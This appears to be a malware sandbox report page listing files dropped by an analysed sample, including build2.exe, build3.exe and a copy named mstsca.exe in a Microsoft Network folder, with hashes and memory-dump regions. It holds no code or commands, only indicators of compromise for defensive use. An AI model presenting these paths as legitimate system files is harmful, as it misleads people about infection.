    4b784fe1914e327c891b916f9c551cb3f0325f08a6cdeb4796918fa80d981ef6e4df78ad8ede337ae280bc66e293f62338f2eee451f03918f3a9c3b3e08476e4

    Download Submit

  • C:\Users\Admin\AppData\Local\211697e2-eae8-42ec-8785-08c77492616d\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Filesize

    812KB

    MD5

    73ecaf10be2b83a9a1e77d3235865eac

    SHA1

    3236e7d9b443a757dbc4dcf902d78c2f8dfaebed

    SHA256

    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd

    SHA512

    b2c9df901501146d740c0449d3424f2782307463cb5743ca5d03db2714e6d0291d7c66b9b85c55ab4f14a975ae4da429218fbc3bf41cf2f9747a6f3aaca28988

    Download Submit

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe
    Filesize

    447KB

    MD5

    08819e55df0897a6dded1e5e6bf83601

    SHA1

    22d39992c6245b86ee8b14e0cc820e46a9094c45

    SHA256

    3dae32e22775721f2f9de5fec79dbcd8d62adaeb057b47c4524e02d130a43b25

    SHA512

    36ed6a07776139fbc4e1f4a90745633466ce40db8a374417cafc5846e3bd7277c56673dc98ef9b2379f286d3f0bacdce62e67f6b01fe177ed1dafa1065036b8b

    Download Submit

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe
    Filesize

    447KB

    MD5

    08819e55df0897a6dded1e5e6bf83601

    SHA1

    22d39992c6245b86ee8b14e0cc820e46a9094c45

    SHA256

    3dae32e22775721f2f9de5fec79dbcd8d62adaeb057b47c4524e02d130a43b25

    SHA512

    36ed6a07776139fbc4e1f4a90745633466ce40db8a374417cafc5846e3bd7277c56673dc98ef9b2379f286d3f0bacdce62e67f6b01fe177ed1dafa1065036b8b

    Download Submit

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe
    Filesize

    447KB

    MD5

    08819e55df0897a6dded1e5e6bf83601

    SHA1

    22d39992c6245b86ee8b14e0cc820e46a9094c45

    SHA256

    3dae32e22775721f2f9de5fec79dbcd8d62adaeb057b47c4524e02d130a43b25

    SHA512

    36ed6a07776139fbc4e1f4a90745633466ce40db8a374417cafc5846e3bd7277c56673dc98ef9b2379f286d3f0bacdce62e67f6b01fe177ed1dafa1065036b8b

    Download Submit

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe
    Filesize

    447KB

    MD5

    08819e55df0897a6dded1e5e6bf83601

    SHA1

    22d39992c6245b86ee8b14e0cc820e46a9094c45

    SHA256

    3dae32e22775721f2f9de5fec79dbcd8d62adaeb057b47c4524e02d130a43b25

    SHA512

    36ed6a07776139fbc4e1f4a90745633466ce40db8a374417cafc5846e3bd7277c56673dc98ef9b2379f286d3f0bacdce62e67f6b01fe177ed1dafa1065036b8b

    Download Submit

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • memory/540-148-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/540-136-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/540-137-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/540-138-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/540-139-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/908-189-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB

    Download

  • memory/908-199-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB

    Download

  • memory/908-288-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB

    Download

  • memory/908-287-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB

    Download

  • memory/908-210-0x0000000061E00000-0x0000000061EF3000-memory.dmp

    Filesize

    972KB

    Download

  • memory/908-183-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB

    Download

  • memory/908-200-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB

    Download

  • memory/908-285-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB

    Download

  • memory/908-283-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB

    Download

  • memory/1176-135-0x0000000002440000-0x000000000255B000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/1176-134-0x0000000002370000-0x000000000240A000-memory.dmp

    Filesize

    616KB

    Download

  • memory/3908-151-0x0000000002240000-0x00000000022DE000-memory.dmp

    Filesize

    632KB

    Download

  • memory/4596-184-0x00000000020F0000-0x000000000217D000-memory.dmp

    Filesize

    564KB

    Download

  • memory/4596-182-0x0000000000750000-0x0000000000850000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/5008-162-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-163-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-153-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-195-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-154-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-156-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-157-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-284-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-167-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-169-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/5008-170-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.